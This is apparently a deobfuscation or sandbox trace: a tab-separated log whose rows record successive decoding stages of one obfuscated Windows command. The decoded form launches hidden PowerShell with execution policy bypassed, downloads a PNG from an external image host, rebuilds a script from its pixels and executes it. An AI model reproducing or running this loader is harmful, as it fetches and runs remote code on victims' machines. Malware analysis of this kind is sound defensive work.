Environment	Get Environment String	name = -}, result_out = set suLrv=. 1 @sheiVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'hei%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsheiVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = .;?, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-O3k9jec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'e3k9C'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.img3k9o'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)3k9'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-3k9andDn5)Dn6)-3k9or'+'1v6Qt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIA3k9le:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsjVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc 3k9`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = +.@#, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'e4-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'4'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Dra4in'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyO4ERsjVElL -noqvNiqvNTEraCTI -qvNolO -4iqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = {'`#, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2DnH0[10.'+'.H)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..H'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_H28+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#H).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn2H).ReplaCE11{CTFAr]DnDn8+{CTFAr]5H+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{H,2H,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = }$]?, result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[10.'+'.4)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.aEe'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)Dn6)-bor'+'1v6Qt'+'t.aE -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'aEetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInaE]{CTFAr]#4).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInaE]{CTFAr]Dn24).ReplaCE11{CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInaE]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{4,24,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = {,., result_out = set suLrv=. 1 @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') 11's'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap11fr qvNet.W'+'ebC'+'lient).'+'OpenRead19a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[10.'+'.4)b'+'S'+'j%\foreacTF1'+'v'+'6'+'Qx in10..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel1v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=1{matTF]::F'+'lo'+'or11v6'+'Qtt.B-bandDn5)Dn6)-bor'+'1v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX1'+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring1v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE1'9ax',{sTRInG]{CTFAr]#4).ReplaCE11{CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInG]{CTFAr]Dn24).ReplaCE11{CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInG]{CTFAr]#6))^&^& seT aDIz`=EcTFO 1gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT11LS eqvNV:s3LrV).vaL3e ) ^^^\|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&1 @eqvNV:Comstyec{4,24,25]-JoIn'')1@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = }{, result_out = set suLrv=. ( @sjVelLId{Dn]+@sTFELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'TFttps://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreacTF('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=({matTF]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{CTFAr]#4).ReplaCE(({CTFAr]98+{CTFAr]8#+{CTFAr]Dn06),{sTRInG]{CTFAr]Dn24).ReplaCE(({CTFAr]DnDn8+{CTFAr]54+{CTFAr]8Dn),{sTRInG]{CTFAr]#6))^&^& seT aDIz`=EcTFO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^\|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN TFIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = .@_#, result_out = set suLrv=. ( @sjVelLId{Dn]+@shELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]Dn06),{sTRInG]{ChAr]Dn24).ReplaCE(({ChAr]DnDn8+{ChAr]54+{ChAr]8Dn),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^\|tyOwERsjVElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = ]${, result_out = set suLrv=. ( @sHelLId{Dn]+@shELlId{Dn#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/fDn/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2Dn40[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-bandDn5)Dn6)-bor'+'(v6Qt'+'t.G -band Dn5))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'Dn'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]Dn06),{sTRInG]{ChAr]Dn24).ReplaCE(({ChAr]DnDn8+{ChAr]54+{ChAr]8Dn),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:eXt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^\|tyOwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = #-, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'ttyixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRityT((LS eqvNV:s3LrV).vaL3e ) ^^^\|tyOwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`tyASS -nOtyrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:Comstyec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = .$+, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' qvN'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'qvName 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr qvNet.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.IqvNVOkesCRiPT((LS eqvNV:s3LrV).vaL3e ) ^^^\|POwERsHElL -noqvNiqvNTEraCTI -qvNolO -wiqvN hIdden -execuTIOqvNpOLIc b`PASS -nOPrOFIle -COmMAqvNd ^^^^^^^&( @eqvNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = +,\, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax['+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'))['+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140[(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+')[v6Qmk'+'{v6Q'+'_428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'}['+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = ]#, result_out = set suLrv=. ( @sHelLId{1]+@shELlId{1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e{] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'{v6Q'+'_428+v6Qx]=({math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'{S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk{0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',{sTRInG]{ChAr]#4).ReplaCE(({ChAr]98+{ChAr]8#+{ChAr]106),{sTRInG]{ChAr]124).ReplaCE(({ChAr]118+{ChAr]54+{ChAr]81),{sTRInG]{ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec{4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = _`@#, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%\foreach('+'v'+'6'+'Qx in(0..4'+'27'+'))\v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
Environment	Get Environment String	name = [_, result_out = set suLrv=. ( @sHelLId[1]+@shELlId[1#]+'X') (('s'+'al f'+'r'+' N'+'ew-Objec'+'t'+';'+'A'+'dd-T'+'`pe -As'+'sembl`'+'Name 9axS`stem.Dra'+'w'+'ing9ax;'+'v6Qds'+'=fr S`ste'+'m.'+'Drawin'+'g.B'+'itmap((fr Net.W'+'ebC'+'lient).'+'OpenRead(9a'+'x'+'https://imag'+'es2.imgbo'+'x.co'+'m/90/f1/'+'gat2MVsK_o.'+'png9ax'+'));'+'v6Q'+'mk=fr B`'+'t'+'e[] '+'2140;(0.'+'.4)b'+'S'+'j%{foreach('+'v'+'6'+'Qx in(0..4'+'27'+')){v6Q'+'t'+'t=v6Qds.Ge'+'tPixel(v6Qx,'+'v'+'6Q_'+');v6Qmk'+'[v6Q'+'_428+v6Qx]=([math]::F'+'lo'+'or((v6'+'Qtt.B-band15)16)-bor'+'(v6Qt'+'t.G -band 15))}'+'};'+'I'+'EX('+'[S`st'+'em.Tex'+'t.E'+'ncodin'+'g'+']::ASCII.'+'GetS'+'tring(v6'+'Q'+'mk[0.'+'.'+'1'+'907'+'])'+')').ReplaCE('9ax',[sTRInG][ChAr]#4).ReplaCE(([ChAr]98+[ChAr]8#+[ChAr]106),[sTRInG][ChAr]124).ReplaCE(([ChAr]118+[ChAr]54+[ChAr]81),[sTRInG][ChAr]#6))^&^& seT aDIz`=EchO (gi vaRIAble:e*Xt).VaLuE.InvOkEComManD.INVOkesCRiPT((LS eNV:s3LrV).vaL3e ) ^^^\|POwERsHElL -noNiNTEraCTI -NolO -wiN hIdden -execuTIONpOLIc b`PASS -nOPrOFIle -COmMANd ^^^^^^^&( @eNV:ComsPec[4,24,25]-JoIn'')(@inpuT ) ^&^& cmd.exE /c %adizY%	1	Fn
